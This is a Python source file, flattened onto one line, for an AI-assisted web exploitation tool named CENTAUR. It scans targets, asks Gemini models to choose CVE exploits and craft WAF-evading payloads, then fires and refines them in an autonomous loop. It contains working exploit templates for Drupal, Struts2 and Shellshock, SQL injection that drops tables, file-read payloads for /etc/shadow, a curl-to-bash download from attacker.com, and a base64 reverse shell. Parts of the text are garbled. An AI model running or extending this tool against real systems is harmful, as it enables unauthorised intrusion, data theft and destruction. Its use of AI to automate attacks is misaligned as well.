import asyncio import httpx import ssl import csv import time import json import base64 import hashlib import re import urllib.parse import pandas as pd import gradio as gr from collections import defaultdict from typing import Dict, List, Tuple, Any, Optional from pydantic import BaseModel, Field from datetime import datetime import traceback try: from google import genai from google.genai import types GEMINI_AVAILABLE = True except ImportError: GEMINI_AVAILABLE = False # ============================================================================== # ENGINE CONTROLS & HEADERS # ============================================================================== MAX_CONCURRENT_RECON = 30 SCAN_TIMEOUT = 8.0 EXPLOIT_TIMEOUT = 15.0 MAX_FIX_ITERATIONS = 3 # Maximum attempts to fix/refine a payload HTTP_HEADERS = { "User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36", "Accept": "text/html,application/json,*/*", "Accept-Language": "en-US,en;q=0.9", "Accept-Encoding": "gzip, deflate", "Connection": "keep-alive", } # ============================================================================== # METASPLOIT EXPLOIT TEMPLATES # ============================================================================== METASPLOIT_TEMPLATES = { "drupal_drupalgeddon2": { "name": "Drupal Drupalgeddon 2 RCE", "description": "Drupal < 7.58 / < 8.3.9 / < 8.4.6 / < 8.5.1 - RCE via form rendering", "cve": "CVE-2018-7600", "target_paths": ["/user/register", "/?q=user/register", "/user/password"], "method": "POST", "payload_template": { "form_id": "user_register_form", "mail[#post_render][]": "exec", "mail[#type]": "markup", "mail[#markup]": "{COMMAND}" } }, "joomla_http_header_rce": { "name": "Joomla 3.0.0-3.4.6 RCE", "description": "Joomla HTTP Header Unauthenticated Remote Code Execution", "cve": "CVE-2015-8562", "target_paths": ["/"], "method": "GET", "headers": { "User-Agent": "() { :; }; echo; /bin/bash -c '{COMMAND}'" } }, "wordpress_xmlrpc_pingback": { "name": "WordPress XML-RPC Pingback", "description": "WordPress XML-RPC SSRF/Port Scanner", "cve": "N/A", "target_paths": ["/xmlrpc.php"], "method": "POST", "headers": {"Content-Type": "text/xml"}, "payload_template": """ pingback.ping {TARGET_URL} {BLOG_URL} """ }, "struts2_content_type": { "name": "Apache Struts2 Content-Type RCE", "description": "Apache Struts 2.3.5 - 2.3.31 / 2.5 - 2.5.10 RCE", "cve": "CVE-2017-5638", "target_paths": ["/"], "method": "POST", "headers": { "Content-Type": "%{(#_='multipart/form-data').(#[email protected]@DEFAULT_MEMBER_ACCESS).(#_memberAccess?(#_memberAccess=#dm):((#container=#context['com.opensymphony.xwork2.ActionContext.container']).(#ognlUtil=#container.getInstance(@com.opensymphony.xwork2.ognl.OgnlUtil@class)).(#ognlUtil.getExcludedPackageNames().clear()).(#ognlUtil.getExcludedClasses().clear()).(#context.setMemberAccess(#dm)))).(#cmd='{COMMAND}').(#iswin=(@java.lang.System@getProperty('os.name').toLowerCase().contains('win'))).(#cmds=(#iswin?{'cmd.exe','/c',#cmd}:{'/bin/bash','-c',#cmd})).(#p=new java.lang.ProcessBuilder(#cmds)).(#p.redirectErrorStream(true)).(#process=#p.start()).(#ros=(@org.apache.struts2.ServletActionContext@getResponse().getOutputStream())).(@org.apache.commons.io.IOUtils@copy(#process.getInputStream(),#ros)).(#ros.flush())}" } }, "shellshock": { "name": "Shellshock (Bash Remote Code Execution)", "description": "GNU Bash 4.3 and earlier Remote Code Execution", "cve": "CVE-2014-6271", "target_paths": ["/cgi-bin/status", "/cgi-bin/test.cgi", "/cgi-bin/admin.cgi"], "method": "GET", "headers": { "User-Agent": "() { :; }; echo; /bin/bash -c '{COMMAND}'" } } } # ============================================================================== # ADVANCED PAYLOAD LIBRARY (enriched) # ============================================================================== PAYLOAD_LIBRARY = { "SQLi": { "Time-Based Blind": [ "' OR SLEEP(5)--", "' AND IF(1=1,SLEEP(5),0)--", "'; WAITFOR DELAY '00:00:05'--", "' OR pg_sleep(5)--", "1' AND (SELECT * FROM (SELECT(SLEEP(5)))a)--", "' OR 1=1 AND SLEEP(5)--", "\" OR SLEEP(5)--", "1; SELECT SLEEP(5)--", ], "Union-Based": [ "' UNION SELECT NULL,NULL,NULL--", "' UNION SELECT 1,@@version,3--", "' UNION SELECT table_name,NULL FROM information_schema.tables--", "-1' UNION ALL SELECT NULL,concat(username,0x3a,password),NULL FROM users--", "' UNION SELECT NULL,group_concat(table_name),NULL FROM information_schema.tables WHERE table_schema=database()--", "' UNION SELECT NULL,load_file('/etc/passwd'),NULL--", ], "Error-Based": [ "' AND extractvalue(1,concat(0x7e,version()))--", "' AND (SELECT 1 FROM (SELECT COUNT(*),CONCAT(version(),FLOOR(RAND(0)*2))x FROM information_schema.tables GROUP BY x)y)--", "' OR 1=convert(int,(SELECT @@version))--", "' AND updatexml(1,concat(0x7e,(SELECT database())),1)--", "' AND exp(~(SELECT * FROM (SELECT user())a))--", ], "Boolean-Based": [ "' AND '1'='1", "' AND '1'='2", "' AND SUBSTRING(@@version,1,1)='5'--", "' AND ASCII(SUBSTRING((SELECT password FROM users LIMIT 1),1,1))>100--", "' AND (SELECT COUNT(*) FROM users)>0--", "' OR EXISTS(SELECT * FROM users)--", ], "Stacked-Queries": [ "'; INSERT INTO users VALUES('hacked','hacked')--", "'; UPDATE users SET password='hacked' WHERE '1'='1'--", "'; DROP TABLE users--", "'; EXEC xp_cmdshell('whoami')--", ], "WAF-Bypass": [ "' /*!OR*/ 1=1--", "' OR/**/1=1--", "' %4fR 1=1--", "'/**/OR/**/1=1--", "' oR sLeEp(5)--", "' OR 0x31=0x31--", ], }, "LFI": { "Basic": [ "../../../../etc/passwd", "..\\..\\..\\..\\windows\\win.ini", "....//....//....//etc/passwd", "..%2f..%2f..%2fetc%2fpasswd", "/etc/passwd", "../../etc/shadow", "../../etc/hosts", ], "Null-Byte": [ "../../../../etc/passwd%00", "../../../../etc/passwd%00.jpg", "../../../../etc/passwd\x00", "../../../../etc/passwd%00.php", ], "Encoding": [ "....%252f....%252f....%252fetc%252fpasswd", "%2e%2e%2f%2e%2e%2f%2e%2e%2fetc%2fpasswd", "..%c0%af..%c0%af..%c0%afetc%c0%afpasswd", "%252e%252e%252f%252e%252e%252fetc%252fpasswd", "..%ef%bc%8f..%ef%bc%8fetc%ef%bc%8fpasswd", ], "Filter-Bypass": [ "/var/www/../../etc/passwd", r"....\/....\/....\/etc/passwd", "/etc/passwd/.", "php://filter/convert.base64-encode/resource=/etc/passwd", ], "PHP-Wrappers": [ "php://filter/convert.base64-encode/resource=index.php", "php://filter/read=string.rot13/resource=config.php", "data://text/plain;base64,PD9waHAgc3lzdGVtKCRfR0VUWydjbWQnXSk7Pz4=", "php://input", "phar://./test.phar/test.txt", "zip://shell.jpg%23payload.php", "expect://id", ], "Log-Poisoning": [ "/var/log/apache2/access.log", "/var/log/nginx/access.log", "/proc/self/environ", "/proc/self/fd/0", "/var/log/auth.log", ], }, "RCE": { "Command-Injection": [ "; id", "| whoami", "`uname -a`", "$(cat /etc/passwd)", "; curl http://attacker.com/shell.sh | bash", "&& id", "|| id", "; ls -la /", "\n id", "%0a id", ], "PHP-Exec": [ "", "", "", "", "", ], "Encoded": [ "; echo YmFzaCAtaSA+JiAvZGV2L3RjcC8xMC4wLjAuMS80NDQ0IDA+JjE= | base64 -d | bash", "; ${IFS}id", "; cat", "{{config.__class__.__init__.__globals__['os'].popen('id').read()}}", "${T(java.lang.Runtime).getRuntime().exec('id')}", ], }, "XSS": { "Reflected": [ "", "", "", "'-alert(1)-'", "", "\">", "'>", ], "Stored": [ "", "", "", ], "DOM-Based": [ "javascript:alert(1)", "#", "#\">", ], "Encoded": [ "%3Cscript%3Ealert(1)%3C/script%3E", "<script>alert(1)</script>", "\\x3cscript\\x3ealert(1)\\x3c/script\\x3e", "\\u003cscript\\u003ealert(1)\\u003c/script\\u003e", ], "Filter-Bypass": [ "", "", "attr": "\" onmouseover=\"alert(1)", "js": "';alert(1)//", "url": "javascript:alert(1)", "svg": "", "img": "", } payload = base_payloads.get(context, base_payloads["html"]) if exfil_url: payload = f"" if bypass: payload = payload.replace("", # expect: 49 "Pebble": "{{7*'7'}}", # Jinja2: 49, Twig: 7777777 "Mako": "${7*7}", } return probes def generate_jinja2_rce(command="id"): """Generate Jinja2 RCE payload.""" return ( "{%for c in [].__class__.__base__.__subclasses__()%}" "{%if c.__name__=='catch_warnings'%}" "{{c.__init__.__globals__['__builtins__']" f".eval(\"__import__('os').popen('{command}').read()\")" "}}{%endif%}{%endfor%}" ) for engine, probe in generate_ssti_probes().items(): print(f"{engine}: {probe}") print("\\nRCE:", generate_jinja2_rce("id")) ''', "Custom": '''import urllib.parse, base64, re def generate_custom_payload(base_payload, encoding=None, evasion=None, prefix="", suffix=""): """ Flexible payload generator. Args: base_payload : The base attack string encoding : url | double_url | base64 | html_entity | unicode_escape evasion : case_variation | comment_insertion | whitespace_abuse | null_bytes prefix/suffix: Wrap the final payload """ result = base_payload # Evasion transforms (applied before encoding) if evasion == "case_variation": result = "".join(c.upper() if i % 2 == 0 else c.lower() for i, c in enumerate(result)) elif evasion == "comment_insertion": result = result.replace(" ", "/**/") elif evasion == "whitespace_abuse": result = result.replace(" ", "%09") # tab elif evasion == "null_bytes": result = result.replace(" ", "%00 ") # Encoding layer if encoding == "url": result = urllib.parse.quote(result, safe="") elif encoding == "double_url": result = urllib.parse.quote(urllib.parse.quote(result, safe=""), safe="") elif encoding == "base64": result = base64.b64encode(result.encode()).decode() elif encoding == "html_entity": result = "".join(f"&#{ord(c)};" for c in result) elif encoding == "unicode_escape": result = result.encode("unicode_escape").decode() return f"{prefix}{result}{suffix}" # Example: SQLi with comment-insertion WAF bypass print(generate_custom_payload("' OR 1=1--", evasion="comment_insertion")) # URL-encoded XSS print(generate_custom_payload("", encoding="url")) # Double-URL LFI print(generate_custom_payload("../../../../etc/passwd", encoding="double_url")) ''' } # ============================================================================== # AI STRUCTURED OUTPUT SCHEMAS # ============================================================================== class VulnerabilityAnalysis(BaseModel): vulnerability_type: str = Field(description="Primary vulnerability class (SQLi, LFI, RCE, XSS, SSTI, NoSQLi, etc.)") confidence: str = Field(description="Confidence level: High, Medium, Low") attack_vector: str = Field(description="Specific attack approach") target_parameters: List[str] = Field(description="Vulnerable parameters or paths") reasoning: str = Field(description="Technical reasoning for this assessment") secondary_vulns: List[str] = Field(default=[], description="Other potential vulnerabilities to probe") related_cves: List[str] = Field(default=[], description="Known CVEs that might apply") class AttackStrategy(BaseModel): vulnerability_class: str = Field(description="Class of vulnerability") target_endpoint: str = Field(description="Specific endpoint and parameter") strategy: str = Field(description="Attack methodology") evasion_techniques: List[str] = Field(description="WAF/IDS evasion methods to apply") expected_indicators: List[str] = Field(description="Success indicators to look for") http_method: str = Field(default="GET", description="HTTP method to use: GET, POST, PUT") content_type: str = Field(default="", description="Content-Type header if POST/PUT needed") request_body_template: str = Field(default="", description="Body template for POST requests, use {PAYLOAD} placeholder") metasploit_template: str = Field(default="", description="Metasploit template to use if applicable") class PayloadGeneration(BaseModel): payload: str = Field(description="The exact payload string") code_template: str = Field(description="Python code to generate this payload") encoding: str = Field(description="Encoding applied (none, url, double-url, base64, etc.)") reasoning: str = Field(description="Why this payload is effective") alternative_payloads: List[str] = Field(description="Backup payloads if primary fails") http_method: str = Field(default="GET", description="HTTP method") inject_in_body: bool = Field(default=False, description="True if payload goes in body, not URL") content_type: str = Field(default="", description="Content-Type for body injection") class ExploitAnalysis(BaseModel): success: bool = Field(description="Whether exploit succeeded") evidence: List[str] = Field(description="Evidence of successful exploitation") next_steps: List[str] = Field(description="Recommended next actions") data_extracted: str = Field(description="Any sensitive data found") vuln_confirmed: str = Field(default="", description="Confirmed vulnerability type") fix_suggestions: List[str] = Field(default=[], description="Suggestions to fix/improve the payload if it failed") class CentaurChatResponse(BaseModel): chat_reply: str = Field(description="Natural language response to operator") suggested_endpoint: str = Field(description="Updated target endpoint") suggested_payload: str = Field(description="Patched/generated payload") suggested_code: str = Field(description="Python code to generate the payload") technical_analysis: str = Field(description="Technical explanation of changes") http_method: str = Field(default="GET", description="HTTP method to use") class PayloadPatchResponse(BaseModel): updated_code: str = Field(description="The patched Python code") changes_made: List[str] = Field(description="List of specific changes applied") explanation: str = Field(description="Explanation of why these changes help") # ============================================================================== # LOGGING SYSTEM # ============================================================================== class ExploitLogger: def __init__(self): self.logs = [] def log(self, level: str, message: str, context: dict = None): entry = { "timestamp": datetime.now().strftime("%Y-%m-%d %H:%M:%S.%f")[:-3], "level": level, "message": message, "context": context or {} } self.logs.append(entry) return entry def get_logs(self, level=None): if level: return [log for log in self.logs if log["level"] == level] return self.logs def format_logs(self): formatted = [] for log in self.logs: ctx = f" | {log['context']}" if log['context'] else "" formatted.append(f"[{log['timestamp']}] {log['level']}: {log['message']}{ctx}") return "\n".join(formatted) def clear(self): self.logs = [] exploit_logger = ExploitLogger() # ============================================================================== # RECON ENGINE # ============================================================================== class ReconProfile: def __init__(self, host: str, port: int): self.target_id = f"{host}:{port}" self.host = host self.port = port self.protocol = "http" self.is_alive = False self.server_banner = "Unknown" self.waf_detected = "None" self.discovered_paths = [] self.error_signatures = [] self.technologies = [] self.cookies = {} self.forms_found = [] self.api_endpoints = [] self.response_time_baseline = 0.0 self.redirect_chain = [] self.injectable_params = [] self.cms_detected = "" @property def is_exploitable(self): return self.is_alive and ( len(self.discovered_paths) > 0 or len(self.error_signatures) > 0 or len(self.forms_found) > 0 or len(self.api_endpoints) > 0 or self.server_banner != "Unknown" ) def to_dict(self): return { "target_id": self.target_id, "protocol": self.protocol, "server": self.server_banner, "waf": self.waf_detected, "cms": self.cms_detected, "paths": len(self.discovered_paths), "errors": len(self.error_signatures), "forms": len(self.forms_found), "apis": len(self.api_endpoints), "tech": ", ".join(self.technologies[:3]), } class AdvancedReconEngine: def __init__(self, profile: ReconProfile): self.p = profile self.client = httpx.AsyncClient( verify=False, timeout=SCAN_TIMEOUT, headers=HTTP_HEADERS, follow_redirects=True, max_redirects=3 ) async def _detect_protocol(self): try: conf = ssl.create_default_context() conf.check_hostname = False conf.verify_mode = ssl.CERT_NONE reader, writer = await asyncio.wait_for( asyncio.open_connection(self.p.host, self.p.port, ssl=conf), timeout=2.0 ) writer.close() await writer.wait_closed() self.p.protocol = "https" except Exception: self.p.protocol = "http" def _url(self, path=""): return f"{self.p.protocol}://{self.p.host}:{self.p.port}{path}" async def _fingerprint_tech(self, response): headers = response.headers body = response.text.lower() if "x-powered-by" in headers: self.p.technologies.append(f"Powered-By: {headers['x-powered-by']}") if "laravel" in body or "laravel_session" in str(response.cookies): self.p.technologies.append("Laravel") if "wordpress" in body or "wp-content" in body: self.p.technologies.append("WordPress") self.p.cms_detected = "WordPress" if "django" in body or "csrftoken" in str(response.cookies): self.p.technologies.append("Django") if "express" in headers.get("x-powered-by", "").lower(): self.p.technologies.append("Express.js") if "flask" in body or "werkzeug" in headers.get("server", "").lower(): self.p.technologies.append("Flask") if "joomla" in body: self.p.technologies.append("Joomla") self.p.cms_detected = "Joomla" if "drupal" in body: self.p.technologies.append("Drupal") self.p.cms_detected = "Drupal" if "struts" in body or "struts" in headers.get("x-powered-by", "").lower(): self.p.technologies.append("Apache Struts") waf_indicators = { "cloudflare": ["cf-ray", "__cfduid"], "akamai": ["akamai", "ak_bmsc"], "aws-waf": ["x-amzn-trace-id", "x-amz-"], "imperva": ["x-iinfo", "incap_ses"], "f5": ["x-wa-info", "f5"], "fortiweb": ["fortigate", "fortiweb"], "modsecurity": ["mod_security", "modsec"], } for waf_name, indicators in waf_indicators.items(): if any(ind in str(headers).lower() for ind in indicators): self.p.waf_detected = waf_name.upper() break async def _scan_paths(self): paths = [ "/admin", "/administrator", "/admin.php", "/wp-admin", "/phpmyadmin", "/cpanel", "/controlpanel", "/dashboard", "/.env", "/.git/config", "/config.php", "/wp-config.php", "/web.config", "/.htaccess", "/robots.txt", "/sitemap.xml", "/api", "/api/v1", "/api/v2", "/graphql", "/rest", "/api/users", "/api/admin", "/api/config", "/upload", "/uploads", "/files", "/download", "/search", "/login", "/logout", "/register", "/?id=1", "/?user=admin", "/?file=index", "/search?q=test", "/api/users?id=1", "/index.php?page=home", "/?page=about", "/xmlrpc.php", "/cgi-bin/status", ] tasks = [self.client.get(self._url(p)) for p in paths] results = await asyncio.gather(*tasks, return_exceptions=True) for path, res in zip(paths, results): if isinstance(res, Exception): continue if hasattr(res, 'history') and res.history: self.p.redirect_chain.append(f"{path} -> {res.url}") if res.status_code in [200, 401, 403, 405]: if "?" not in path: self.p.discovered_paths.append(path) else: self.p.api_endpoints.append(path) params = re.findall(r'\?([^=]+)=|&([^=]+)=', path) for p_match in params: param = p_match[0] or p_match[1] if param and param not in self.p.injectable_params: self.p.injectable_params.append(param) if " (baseline + 4.0) and any(x in payload.upper() for x in ["SLEEP", "WAITFOR", "PG_SLEEP", "DBMS_PIPE"])): result.success = True result.evidence.append(f"Time-Based SQLi: {result.response_time:.2f}s delay") # SQL error leak sql_errors = ["sql syntax", "mysql", "postgresql", "sqlite", "oracle", "mssql", "syntax error at", "quoted string not properly terminated", "unclosed quotation", "division by zero", "invalid column"] for err in sql_errors: if err in body_lower: result.success = True result.evidence.append(f"SQL Error: '{err}'") # RCE / command output rce_markers = ["uid=", "gid=", "groups=", "Linux version", "Windows NT", "Microsoft Windows", "drwx", "total ", "/bin/bash", "root@", "#", "SYSTEM", "nt authority"] for marker in rce_markers: if marker in resp.text: result.success = True result.evidence.append(f"RCE: '{marker}' found") result.extracted_data = resp.text[:800] # XXE if " str: """Execute a payload code template and return the printed output.""" import io, contextlib out = io.StringIO() local_ns = {} try: with contextlib.redirect_stdout(out): exec(compile(code, "", "exec"), {}, local_ns) printed = out.getvalue().strip() if printed: return printed.split("\n")[0] if "payload" in local_ns: return str(local_ns["payload"]) except Exception as e: return f"# Code error: {e}" return "" # ============================================================================== # AI AGENT FUNCTIONS (UPGRADED TO GEMINI 2.5) # ============================================================================== async def ai_analyze_target(profile: ReconProfile, api_key: str) -> Optional[VulnerabilityAnalysis]: """Analyze target using Gemini 2.5 with Google Search grounding""" if not api_key: return None llm = genai.Client(api_key=api_key) # Build context with CMS/technology specific CVE search hints search_hints = [] if profile.cms_detected: search_hints.append(f"{profile.cms_detected} known CVEs") for tech in profile.technologies[:3]: search_hints.append(f"{tech} vulnerabilities") context = f""" Analyze this web application target for vulnerabilities: TARGET: {profile.target_id} SERVER: {profile.server_banner} WAF: {profile.waf_detected} CMS: {profile.cms_detected} TECHNOLOGIES: {', '.join(profile.technologies)} INJECTABLE PARAMS: {profile.injectable_params[:10]} DISCOVERED PATHS: {profile.discovered_paths[:10]} API ENDPOINTS: {profile.api_endpoints[:10]} FORMS FOUND: {profile.forms_found[:5]} ERROR SIGNATURES: {profile.error_signatures[:5]} SEARCH FOR: Known CVEs and exploits related to: {', '.join(search_hints[:5])} Provide a detailed vulnerability assessment focusing on the most exploitable attack vectors. Include any known CVEs that apply to the detected technologies. Include secondary vulnerabilities to chain. """ try: # Enable Google Search grounding grounding_tool = types.Tool(google_search=types.GoogleSearch()) config = types.GenerateContentConfig( tools=[grounding_tool], response_mime_type="application/json", response_json_schema=VulnerabilityAnalysis.model_json_schema() ) resp = await llm.aio.models.generate_content( model="gemini-2.5-flash", contents=context, config=config ) return VulnerabilityAnalysis.model_validate_json(resp.text) except Exception as e: exploit_logger.log("ERROR", f"AI Analysis error: {e}") return None async def ai_generate_strategy(profile: ReconProfile, analysis: VulnerabilityAnalysis, api_key: str) -> Optional[AttackStrategy]: """Generate attack strategy with Metasploit template matching""" llm = genai.Client(api_key=api_key) # Check if we have a matching Metasploit template matching_template = None for template_id, template in METASPLOIT_TEMPLATES.items(): if profile.cms_detected and profile.cms_detected.lower() in template["name"].lower(): matching_template = template_id break for cve in analysis.related_cves: if cve in template.get("cve", ""): matching_template = template_id break context = f""" Based on this vulnerability analysis, create a detailed attack strategy: ANALYSIS: {analysis.model_dump_json(indent=2)} TARGET CONTEXT: - Server: {profile.server_banner} - WAF: {profile.waf_detected} - CMS: {profile.cms_detected} - Technologies: {', '.join(profile.technologies)} - Available endpoints: {profile.api_endpoints[:5]} - Forms: {profile.forms_found[:5]} - Injectable params: {profile.injectable_params[:10]} METASPLOIT TEMPLATES AVAILABLE: {json.dumps(METASPLOIT_TEMPLATES, indent=2)} {"RECOMMENDED TEMPLATE: " + matching_template if matching_template else ""} Specify whether to use GET or POST. For SQLi/LFI/XSS in form fields use POST. If a Metasploit template applies, specify it in the metasploit_template field. Generate a comprehensive attack strategy including WAF evasion techniques. """ try: grounding_tool = types.Tool(google_search=types.GoogleSearch()) config = types.GenerateContentConfig( tools=[grounding_tool], response_mime_type="application/json", response_json_schema=AttackStrategy.model_json_schema() ) resp = await llm.aio.models.generate_content( model="gemini-2.5-flash", contents=context, config=config ) return AttackStrategy.model_validate_json(resp.text) except Exception as e: exploit_logger.log("ERROR", f"Strategy generation error: {e}") return None async def ai_craft_payload(strategy: AttackStrategy, profile: ReconProfile, api_key: str) -> Optional[PayloadGeneration]: """Craft payload with Metasploit template support""" llm = genai.Client(api_key=api_key) vuln_class = strategy.vulnerability_class library_payloads = [] for vtype, categories in PAYLOAD_LIBRARY.items(): if vtype.lower() in vuln_class.lower() or vuln_class.lower() in vtype.lower(): for cat_payloads in categories.values(): library_payloads.extend(cat_payloads[:3]) # Get Metasploit template if specified metasploit_context = "" if strategy.metasploit_template and strategy.metasploit_template in METASPLOIT_TEMPLATES: template = METASPLOIT_TEMPLATES[strategy.metasploit_template] metasploit_context = f""" METASPLOIT TEMPLATE TO USE: {json.dumps(template, indent=2)} Use this template as the basis for your payload. Adapt it for the target endpoint. """ template_hint = "Custom" if "SQLi" in vuln_class or "SQL" in vuln_class: template_hint = "SQLi_TimeBased" if "time" in strategy.strategy.lower() else "SQLi_Union" elif "LFI" in vuln_class: template_hint = "LFI_Basic" elif "RCE" in vuln_class or "Command" in vuln_class: template_hint = "RCE_CommandInjection" elif "XSS" in vuln_class: template_hint = "XSS_Basic" elif "SSTI" in vuln_class: template_hint = "SSTI_Detection" context = f""" Craft an advanced exploitation payload with Python code: STRATEGY: {strategy.model_dump_json(indent=2)} WAF DETECTED: {profile.waf_detected} SERVER: {profile.server_banner} {metasploit_context} REFERENCE PAYLOADS (use as inspiration, modify for evasion): {json.dumps(library_payloads[:12], indent=2)} PYTHON CODE TEMPLATE BASE (extend/modify this): ```python {PAYLOAD_CODE_TEMPLATES.get(template_hint, PAYLOAD_CODE_TEMPLATES["Custom"])} ``` REQUIREMENTS: 1. Generate the exact payload string ready to fire 2. Provide Python code that generates this payload as a callable function 3. Apply WAF evasion from the strategy 4. Set inject_in_body=True and provide content_type if the attack needs POST body injection 5. Provide 4+ alternative payloads ranked by likelihood of success 6. If using a Metasploit template, adapt it for this specific target """ try: grounding_tool = types.Tool(google_search=types.GoogleSearch()) config = types.GenerateContentConfig( tools=[grounding_tool], response_mime_type="application/json", response_json_schema=PayloadGeneration.model_json_schema() ) resp = await llm.aio.models.generate_content( model="gemini-2.5-flash", contents=context, config=config ) pg = PayloadGeneration.model_validate_json(resp.text) exploit_logger.log("INFO", "AI generated payload", { "payload": pg.payload[:80], "encoding": pg.encoding, "method": pg.http_method, }) return pg except Exception as e: exploit_logger.log("ERROR", f"Payload generation error: {e}") return None async def ai_analyze_exploit_result(result: ExploitResult, payload: str, api_key: str) -> Optional[ExploitAnalysis]: """Analyze exploit results and provide fix suggestions""" llm = genai.Client(api_key=api_key) context = f""" Analyze this exploitation attempt: PAYLOAD USED: {payload} RESULTS: - Status Code: {result.status_code} - Response Time: {result.response_time}s - Evidence Found: {result.evidence} RESPONSE SNIPPET: {result.response_body[:800]} EXTRACTED DATA: {result.extracted_data[:400]} Determine if the exploit succeeded, what was confirmed, and recommend next escalation steps. If the exploit failed, provide specific suggestions to fix/improve the payload. """ try: config = types.GenerateContentConfig( response_mime_type="application/json", response_json_schema=ExploitAnalysis.model_json_schema() ) resp = await llm.aio.models.generate_content( model="gemini-2.5-flash", contents=context, config=config ) return ExploitAnalysis.model_validate_json(resp.text) except Exception as e: exploit_logger.log("ERROR", f"Exploit analysis error: {e}") return None # ============================================================================== # AI CODE PATCHING # ============================================================================== async def ai_patch_payload_code(current_code: str, user_request: str, context: dict, api_key: str) -> Optional[PayloadPatchResponse]: llm = genai.Client(api_key=api_key) prompt = f""" You are a penetration testing expert. Patch the following Python payload generation code. CURRENT CODE: ```python {current_code} ``` CONTEXT: - Target: {context.get('target', 'Unknown')} - Server: {context.get('server', 'Unknown')} - WAF: {context.get('waf', 'None')} - Last Result: {context.get('last_result', 'N/A')} USER REQUEST: {user_request} INSTRUCTIONS: 1. Modify the code to address the user's request 2. Keep it as executable Python code with functions 3. Add comments explaining changes 4. Ensure the code prints the primary payload as the first line of stdout Provide patched code and explain what changed. """ try: config = types.GenerateContentConfig( response_mime_type="application/json", response_json_schema=PayloadPatchResponse.model_json_schema() ) resp = await llm.aio.models.generate_content( model="gemini-2.5-flash", contents=prompt, config=config ) patch = PayloadPatchResponse.model_validate_json(resp.text) exploit_logger.log("INFO", "AI patched code", {"changes": len(patch.changes_made)}) return patch except Exception as e: exploit_logger.log("ERROR", f"Code patching failed: {e}") return None # ============================================================================== # FIX LOOP - Iterative Payload Refinement # ============================================================================== async def fix_loop_execute(profile: ReconProfile, strategy: AttackStrategy, initial_payload: PayloadGeneration, api_key: str, max_iterations: int = MAX_FIX_ITERATIONS): """ Execute payload with fix loop: try -> analyze -> fix -> retry """ exploit_logger.log("INFO", f"Starting fix loop with max {max_iterations} iterations") current_payload = initial_payload iteration_results = [] for iteration in range(max_iterations): exploit_logger.log("INFO", f"Fix loop iteration {iteration + 1}/{max_iterations}") # Fire the payload result = await advanced_payload_fire( profile.protocol, profile.host, profile.port, strategy.target_endpoint, current_payload.payload, profile.response_time_baseline, http_method=current_payload.http_method, inject_in_body=current_payload.inject_in_body, content_type=current_payload.content_type, ) # Analyze the result analysis = await ai_analyze_exploit_result(result, current_payload.payload, api_key) iteration_results.append({ "iteration": iteration + 1, "payload": current_payload.payload[:100], "success": result.success, "evidence": result.evidence, "analysis": analysis.model_dump() if analysis else None }) # If successful, we're done if result.success: exploit_logger.log("INFO", f"Fix loop succeeded on iteration {iteration + 1}") return result, iteration_results # If we have fix suggestions and haven't hit max iterations, try to fix if analysis and analysis.fix_suggestions and iteration < max_iterations - 1: exploit_logger.log("INFO", f"Attempting to fix payload based on suggestions") # Generate improved payload based on suggestions fix_context = f""" Previous payload failed. Apply these fixes: {', '.join(analysis.fix_suggestions)} Original strategy: {strategy.model_dump_json(indent=2)} Last result: - Status: {result.status_code} - Evidence: {result.evidence} - Response: {result.response_body[:200]} Generate an improved payload that addresses the failure. """ try: llm = genai.Client(api_key=api_key) config = types.GenerateContentConfig( response_mime_type="application/json", response_json_schema=PayloadGeneration.model_json_schema() ) resp = await llm.aio.models.generate_content( model="gemini-2.5-flash", contents=fix_context, config=config ) current_payload = PayloadGeneration.model_validate_json(resp.text) exploit_logger.log("INFO", f"Generated new payload: {current_payload.payload[:80]}") except Exception as e: exploit_logger.log("ERROR", f"Failed to generate fix: {e}") break else: # No more suggestions or max iterations reached break exploit_logger.log("INFO", f"Fix loop completed after {len(iteration_results)} iterations") return result, iteration_results # ============================================================================== # WAR ROOM AGENT # ============================================================================== async def centaur_chat_agent(user_msg, chat_history, target_id, state, current_ep, current_pl, current_code, http_method, api_key): """Centaur chat agent with Gradio 6 compatibility""" chat_history = chat_history or [] if not api_key or not target_id: chat_history.append({"role": "user", "content": user_msg}) chat_history.append({"role": "assistant", "content": "๐Ÿ”ด Missing API Key or Target Selection."}) return chat_history, current_ep, current_pl, current_code, http_method, state llm = genai.Client(api_key=api_key) p = state["profiles"][target_id] recent_arsenal = state["arsenal"][target_id][-5:] if target_id in state["arsenal"] else [] context = f""" You are CENTAUR, an elite Red Team AI assistant specialising in web application security. TARGET INTELLIGENCE: - ID: {target_id} - Server: {p.server_banner} - WAF: {p.waf_detected} - CMS: {p.cms_detected} - Technologies: {', '.join(p.technologies)} - Discovered Paths: {p.discovered_paths[:10]} - API Endpoints: {p.api_endpoints[:10]} - Forms: {p.forms_found[:5]} - Injectable Params: {p.injectable_params[:10]} - Error Signatures: {p.error_signatures[:5]} - Response Baseline: {p.response_time_baseline:.2f}s CURRENT STATE: HTTP Method: {http_method} Endpoint: {current_ep} Payload: {current_pl} CURRENT CODE: ```python {current_code} ``` RECENT ATTEMPTS: {json.dumps(recent_arsenal, indent=2)} OPERATOR REQUEST: {user_msg} INSTRUCTIONS: 1. Analyse the request using all available intelligence 2. Update endpoint, payload, code, and HTTP method as needed 3. Provide expert technical guidance with specific references to recon data 4. Explain evasion techniques clearly 5. Return http_method as GET or POST based on the best attack approach """ try: config = types.GenerateContentConfig( response_mime_type="application/json", response_json_schema=CentaurChatResponse.model_json_schema() ) resp = await llm.aio.models.generate_content( model="gemini-2.5-flash", contents=context, config=config ) data = CentaurChatResponse.model_validate_json(resp.text) formatted_reply = f"**{data.chat_reply}**\n\n๐Ÿ“‹ Technical Analysis:\n{data.technical_analysis}" chat_history.append({"role": "user", "content": user_msg}) chat_history.append({"role": "assistant", "content": formatted_reply}) state["arsenal"][target_id].append({ "Timestamp": datetime.now().strftime("%H:%M:%S"), "Method": data.http_method, "Endpoint": data.suggested_endpoint, "Payload": data.suggested_payload, "Status": "๐Ÿค– AI Generated", "Notes": f"From: {user_msg[:50]}...", }) return (chat_history, data.suggested_endpoint, data.suggested_payload, data.suggested_code, data.http_method, state) except Exception as e: exploit_logger.log("ERROR", f"Chat agent failed: {e}") chat_history.append({"role": "user", "content": user_msg}) chat_history.append({"role": "assistant", "content": f"โš ๏ธ Agent Error: {str(e)}"}) return chat_history, current_ep, current_pl, current_code, http_method, state # ============================================================================== # AUTONOMOUS FLEET # ============================================================================== async def run_autonomous_fleet(selected, api_key, state): """Run autonomous fleet with fix loop integration""" if not api_key or not selected: return 